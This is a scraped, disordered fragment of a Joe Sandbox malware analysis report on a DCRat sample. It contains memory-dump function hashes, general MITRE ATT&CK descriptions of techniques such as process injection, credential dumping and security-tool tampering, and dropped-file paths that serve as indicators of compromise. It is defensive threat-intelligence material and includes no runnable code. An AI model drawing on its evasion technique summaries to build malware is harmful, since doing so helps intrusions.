Opcode ID: d14c68c6ac486703bea40b4d19bbe023f32ed64f68c717eb0eeb62bf48c65e26
Instruction ID: a0f9f81943ddbc20ef90d0636a1d8d7245a31afd1e60b27c7db55910d0a083b5
Opcode Fuzzy Hash: d14c68c6ac486703bea40b4d19bbe023f32ed64f68c717eb0eeb62bf48c65e26
Instruction Fuzzy Hash: 06F0C470E0650EEFDB58DF84E8A09EDB7B1FF58311F21052AE406A76A0DB786A40DB50

Function 00007FFD9B8B2BBD Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1825845630.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8b1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81ef9edb18d1ef87450ca1e2e8f7a148afc9ea8296a241ef55fdb1033eedd889
Instruction ID: defa45bbbbdd8d64b7f748639b05305cae8150f8301a902a28f25c903dc861ef
Opcode Fuzzy Hash: 81ef9edb18d1ef87450ca1e2e8f7a148afc9ea8296a241ef55fdb1033eedd889
Instruction Fuzzy Hash: E9F0D030E0551D8BEB60EBA8D854BEC77B1EB59301F1082A6C41DE3251DE386B948F54

Function 00007FFD9B8B54AB Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1825845630.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8b1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26a3d21dd25eae7ab156eee16a073ee4613e6ef518c0e3c53c0a0a20ba0fa8d7
Instruction ID: 6b145943fe0310216464e27bc6cfa44dc92ed7b58ddc2bcfd9e46b721a5ee423
Opcode Fuzzy Hash: 26a3d21dd25eae7ab156eee16a073ee4613e6ef518c0e3c53c0a0a20ba0fa8d7
Instruction Fuzzy Hash: 8DD012B5D06B2E9FDBA4DF6888AE2E8BBE1FF5C704B40512AE40CD3551DF2025019F40

Function 00007FFD9B8AB7F3 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1825845630.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b8aa000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed43f206cabc6cb575211afdead778f0c16d72d0f59da7fe93a7f7c5ee73a9e4
Instruction ID: 17a068ce50f74391550c83537e8939f3bd2d2864ca5e9f8b602b75e5f91bc19d
Opcode Fuzzy Hash: ed43f206cabc6cb575211afdead778f0c16d72d0f59da7fe93a7f7c5ee73a9e4
Instruction Fuzzy Hash: 5CD09E20A1945D4AEB64EB54C450BA9B264FF18340F1086E1800EE2156DA346A818B50

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hK8z1AmKO1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\PortsavesPerfdhcpsvc\7ccfebd9e92364

C:\PortsavesPerfdhcpsvc\UserOOBEBroker.exe

C:\PortsavesPerfdhcpsvc\ea1d8f6d871115

C:\PortsavesPerfdhcpsvc\jTMUiy4UT3fzJ0p29vviWqbG.vbe

C:\PortsavesPerfdhcpsvc\oSG0DtwH58jESdPiWbQWqH7Kb5.bat

C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe

C:\PortsavesPerfdhcpsvc\upfc.exe

C:\Recovery\66fc9ff0ee96c2

C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

C:\Recovery\b18e80167b8317

C:\Recovery\sihost.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\aVgRtcWKvuiHvUKTYwWvDjIq.exe.log

Windows Analysis Report
hK8z1AmKO1.exe

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre